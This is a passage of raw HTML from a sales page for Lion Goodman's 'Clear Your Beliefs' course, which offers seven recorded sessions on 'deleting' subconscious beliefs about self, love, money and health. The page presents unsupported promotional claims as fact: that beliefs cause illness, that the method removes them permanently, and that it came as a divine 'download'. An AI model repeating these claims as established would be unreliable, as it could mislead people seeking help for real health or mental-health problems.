Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   